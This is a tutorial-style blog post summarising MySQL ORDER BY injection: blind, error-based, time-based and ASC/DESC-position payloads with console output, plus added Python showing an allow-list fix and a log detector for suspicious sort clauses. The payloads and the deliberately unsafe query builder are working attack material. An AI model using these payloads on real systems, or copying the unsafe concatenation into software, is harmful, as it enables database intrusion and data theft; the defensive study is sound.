  • Summary: ORDER BY injection

    I plan to summarize, one by one, the things I have already learned, including some articles I read earlier and a few small tricks; I'll start with injection.

    0x01 Blind injection

    1. Distinguishing true (1) from false (0)

    a. if

    mysql> select * from user where user_id=1 order by 1-if(substr(version(),1,1)=5,1,(select 1 union select 2));
    +-------+-----------+---------+
    | user  | password  | user_id |
    +-------+-----------+---------+
    | admin | admintest |       1 |
    +-------+-----------+---------+
    1 row in set (0.00 sec)
    

    b. rand

    mysql> select rand(true);
    +---------------------+
    | rand(true)          |
    +---------------------+
    | 0.40540353712197724 |
    +---------------------+
    1 row in set (0.00 sec)
    
    mysql> select rand(false);
    +---------------------+
    | rand(false)         |
    +---------------------+
    | 0.15522042769493574 |
    +---------------------+
    1 row in set (0.00 sec)
    

    Here we can exploit the fact that rand(true) and rand(false) yield different values, so the row order produced by the injected ORDER BY also differs depending on the condition.

    mysql> select * from user order by 1-rand(substr(version(),1,1)=5);
    +-------+-----------+---------+
    | user  | password  | user_id |
    +-------+-----------+---------+
    | test  | testadmin |       2 |
    | admin | admintest |       1 |
    | sp4rk | sp4rktest |       3 |
    +-------+-----------+---------+
    3 rows in set (0.02 sec)
    
    

    c. regexp

    mysql> select * from user order by 1-if(1=(select 1 regexp if(1=1,1,0x00)),1,1);
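    Every variant above works only because the application splices untrusted text straight into the ORDER BY clause. The Python snippet below is an added example (not from the original post): it shows that vulnerable string-building form next to a hardened one, which maps the client-supplied sort key onto a fixed allow-list, since a column name or direction cannot be bound as a placeholder parameter. The table and rows are constructed to mirror the post's `user` table and run in an in-memory SQLite database (assumption: SQLite stands in for MySQL so the example needs no server).

```python
import sqlite3

# Constructed rows mirroring the post's `user` table (sample data, not the post's dump).
SAMPLE_ROWS = [("admin", "admintest", 1), ("test", "testadmin", 2), ("sp4rk", "sp4rktest", 3)]

# Allow-list: the only sort keys and directions the application intends to expose.
# Keys are what the client may send; values are the SQL that will actually be emitted.
ALLOWED_SORT_COLUMNS = {"user": "user", "user_id": "user_id"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_query_unsafe(sort: str) -> str:
    """Vulnerable form: whatever the client sent lands in ORDER BY verbatim,
    so `1-if(...)`, `1-sleep(5)` or `,updatexml(...)` are executed as SQL."""
    return f"SELECT user, password, user_id FROM user ORDER BY {sort}"


def build_query_safe(column: str, direction: str = "asc") -> str:
    """Hardened form: a column name cannot be passed as a bound parameter, so the
    untrusted value is used only as a dictionary key and never copied into SQL."""
    try:
        col = ALLOWED_SORT_COLUMNS[column]
        dirn = ALLOWED_DIRECTIONS[direction.lower()]
    except KeyError:
        # Reject rather than fall back silently; the caller should answer with a 4xx.
        raise ValueError(f"unsupported sort key or direction: {column!r} {direction!r}") from None
    return f"SELECT user, password, user_id FROM user ORDER BY {col} {dirn}"


def sort_is_accepted(column: str, direction: str = "asc") -> bool:
    """True when the allow-list lets the sort through, False when it is rejected."""
    try:
        build_query_safe(column, direction)
    except ValueError:
        return False
    return True


def users_sorted(column: str, direction: str = "asc") -> list[str]:
    """Run the hardened query against an in-memory SQLite copy of the sample table
    and return the user names in the resulting order."""
    conn = sqlite3.connect(":memory:")
    try:
        conn.execute("CREATE TABLE user (user TEXT, password TEXT, user_id INTEGER)")
        conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_ROWS)
        return [row[0] for row in conn.execute(build_query_safe(column, direction))]
    finally:
        conn.close()


if __name__ == "__main__":
    payload = "1-if(substr(version(),1,1)=5,1,(select 1 union select 2))"  # payload from the post
    print("unsafe:", build_query_unsafe(payload))          # the payload reaches the SQL text
    print("accepted:", sort_is_accepted(payload))           # False: the allow-list rejects it
    print("safe order:", users_sorted("user_id", "desc"))   # ['sp4rk', 'test', 'admin']
```

    The point of the allow-list is that the client string is never copied into the query: only the dictionary value is, and that value is fixed by the developer. Mapping ordinal positions (`order by 1`) through the same dictionary works as well; what must never happen is a fall-through that emits the raw value when it is not recognised.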

    0x02 Error-based injection

    mysql> select * from user order by 1-updatexml(1,concat(0x5e24,version(),0x5e24),0);
    ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
    mysql> select * from user order by 1-extractvalue(1,concat(0x5e24,version(),0x5e24));
    ERROR 1105 (HY000): XPATH syntax error: '^$5.7.22-0ubuntu18.04.1^$'
    

    0x03 Time-based (delay) injection

    mysql> select * from user order by 1-if(ascii(substr(user(),1,1))=114,sleep(5),0);

    0x04 At the ASC/DESC position

    1. Blind injection

    mysql> select user from user order by user,if(substr(version(),1,1)=5,1,(select 1 union select 2)) desc;
    +-------+
    | user  |
    +-------+
    | admin |
    | sp4rk |
    | test  |
    +-------+
    

    The error-based and time-based variants are the same as above.

    0x05 Sorting by a logical distinction

    mysql> select user from user order by 1-if(1=1,user,user_id);
    +-------+
    | user  |
    +-------+
    | admin |
    | test  |
    | sp4rk |
    +-------+
    3 rows in set, 3 warnings (0.00 sec)
    
    mysql> select user from user order by 1-if(1=1,user_id,user);
    +-------+
    | user  |
    +-------+
    | sp4rk |
    | test  |
    | admin |
    +-------+
    
    payload:
    ,if(1=1,user_id,user)
    ,(case when (1=1) then user_id else user end)
    ,ifnull(null,user_id)
    ,rand(1=1)
    
    

    0x06 Using errors to make the judgement

    payload:
    if(1=1,1,(select 1 union select 2))  no error
    if(1=2,1,(select 1 union select 2))  error
    if(1=1,1,(select 1 from information_schema.tables))  no error
    if(1=2,1,(select 1 from information_schema.tables))  error
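    All of the payload families on this page (IF/RAND/REGEXP conditions, UPDATEXML/EXTRACTVALUE errors, SLEEP delays, subqueries in the ASC/DESC position) leave behind an ORDER BY clause that is not a plain list of columns or positions, which is what a defender can key on. The detector below is an added example, not part of the original post: it scans constructed MySQL general-log-style lines (sample data, not a real log) and flags every ORDER BY clause that deviates from `identifier|position [ASC|DESC], ...`, tagging which family the clause resembles. The "<time> <thread> Query <sql>" line layout is an assumption; adapt the `Query` extraction to your own logging format.

```python
import re

# Constructed MySQL general-log-style lines (sample data, not a real log). The
# "<time> <thread> Query <sql>" layout is an assumption about the log format.
SAMPLE_LOG = """\
2018-05-25T10:00:01.000000Z\t   12 Query\tselect user, user_id from user order by user_id desc
2018-05-25T10:00:02.000000Z\t   12 Query\tselect * from user order by 1-if(ascii(substr(user(),1,1))=114,sleep(5),0)
2018-05-25T10:00:03.000000Z\t   13 Query\tselect * from user order by 1-updatexml(1,concat(0x5e24,version(),0x5e24),0)
2018-05-25T10:00:04.000000Z\t   13 Query\tselect user from user order by user,if(substr(version(),1,1)=5,1,(select 1 union select 2)) desc
2018-05-25T10:00:05.000000Z\t   14 Query\tselect user from user order by 2, user asc
2018-05-25T10:00:06.000000Z\t   14 Query\tselect * from user order by 1-rand(substr(version(),1,1)=5)
2018-05-25T10:00:07.000000Z\t   15 Query\tselect user, password from user where user_id = 1
"""

# What a legitimate ORDER BY looks like: identifiers or column positions, each
# optionally followed by ASC/DESC, separated by commas. Anything else is an expression.
_ITEM = r"(?:`[^`]+`|[A-Za-z_][A-Za-z0-9_.]*|\d+)(?:\s+(?:asc|desc))?"
BENIGN_ORDER_BY = re.compile(rf"^\s*{_ITEM}(?:\s*,\s*{_ITEM})*\s*$", re.IGNORECASE)

# Which payload family from the post an expression resembles; list order is report order.
INDICATORS = [
    ("time-based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("error-based", re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)),
    ("subquery", re.compile(r"\bselect\b", re.I)),
    ("conditional", re.compile(r"\b(?:if|ifnull|case|rand|regexp)\b", re.I)),
]

# The ORDER BY clause runs up to LIMIT, a semicolon, or the end of the statement.
ORDER_BY_CLAUSE = re.compile(r"\border\s+by\s+(.*?)(?:\s+limit\b|\s*;|$)", re.I | re.S)


def analyze_order_by(sql: str):
    """Return (clause, indicators) for a query with an ORDER BY, or None without one.
    `indicators` is an empty list when the clause is a plain column/position list."""
    m = ORDER_BY_CLAUSE.search(sql)
    if not m:
        return None
    clause = m.group(1).strip()
    if BENIGN_ORDER_BY.match(clause):
        return clause, []
    hits = [name for name, rx in INDICATORS if rx.search(clause)]
    # An arithmetic or function expression with no known marker is still worth a look.
    return clause, hits or ["expression"]


def scan_log(text: str):
    """Return a list of (line_no, clause, indicators) for every logged query whose
    ORDER BY is not a plain column/position list."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = re.search(r"\bQuery\s+(.*)$", line)
        if not m:
            continue
        result = analyze_order_by(m.group(1))
        if result and result[1]:
            findings.append((line_no, result[0], result[1]))
    return findings


if __name__ == "__main__":
    for line_no, clause, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(hits):<24} ORDER BY {clause}")
```

    Run over the sample, the detector flags lines 2, 3, 4 and 6 and leaves the two well-formed sort clauses and the query without ORDER BY alone. The rule is deliberately structural rather than keyword-only: a clause such as `1-1` carries none of the markers yet is still reported as an expression, because a legitimate application never needs arithmetic in its sort key.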
    
  • Original post: https://www.cnblogs.com/spark-xl/p/9080398.html